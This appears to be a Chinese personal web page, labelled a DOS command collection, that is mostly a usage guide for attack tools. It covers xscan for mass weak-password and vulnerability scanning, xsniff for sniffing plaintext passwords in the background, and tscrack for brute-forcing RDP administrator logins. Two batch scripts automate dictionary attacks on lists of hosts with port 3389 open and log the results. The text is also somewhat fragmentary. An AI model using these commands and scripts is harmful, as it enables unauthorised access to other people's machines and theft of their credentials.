• 微信:
  • hai764003
  • QQ:
  • 511211014
  • E-mail:
  • jaquery@163.com

案例总数51

访问总数312319

收藏总数310850

Windows下DOS命令大全(经典收藏)返回列表

上传时间:2015-03-25 内容关键字:Windows下DOS命令大全(经典收藏)


>与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
#8 八:
2、扫锚工具:xscan.exe
基本格式 
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 
检测项目 
-active 检测主机是否存活 
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议) 
-port 检测常用服务的端口状态 
-ftp 检测FTP弱口令 
-pub 检测FTP服务匿名用户写权限 
-pop3 检测POP3-Server弱口令 
-smtp 检测SMTP-Server漏洞 
-sql 检测SQL-Server弱口令 
-smb 检测NT-Server弱口令 
-iis 检测IIS编码/解码漏洞 
-cgi 检测CGI漏洞 
-nasl 加载Nessus攻击脚本 
-all 检测以上所有项目 
其它选项 
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 
-l 显示所有网络适配器 
-v 显示详细扫描进度 
-p 跳过没有响应的主机 
-o 跳过没有检测到开放端口的主机 
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 
用法示例 
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明 
-tcp 输出TCP数据报 
-udp 输出UDP数据报 
-icmp 输出ICMP数据报 
-pass 过滤密码信息 
-hide 后台运行 
-host 解析主机名 
-addr IP地址 过滤IP地址 
-port 端口 过滤端口 
-log 文件名 将输出保存到文件 
-asc 以ASCII形式输出 
-hex 以16进制形式输出 
用法示例 
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 
4、终端服务密码破解: tscrack.exe
参数说明 
-h 显示使用帮助 
-v 显示版本信息 
-s 在屏幕上打出解密能力 
-b 密码错误时发出的声音 
-t 同是发出多个连接(多线程) 
-N Prevent System Log entries on targeted server 
-U 卸载移除tscrack组件 
-f 使用-f后面的密码 
-F 间隔时间(频率) 
-l 使用-l后面的用户名 
-w 使用-w后面的密码字典 
-p 使用-p后面的密码 
-D 登录主页面 
用法示例 
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码 
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 
@if not exist ipcscan.txt goto noscan 
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 
nscan 
@echo 3389.txt no find or scan faild 
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat 
@if not exist tscrack.exe goto noscan 
@tscrack %1 -l administrator -w pass.dic >>rouji.txt 
:noscan 
@echo tscrack.exe no find or scan faild 
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) 

 

小海哥推荐你看: 博客园  php教程分享网站  phpmywind  脚本之家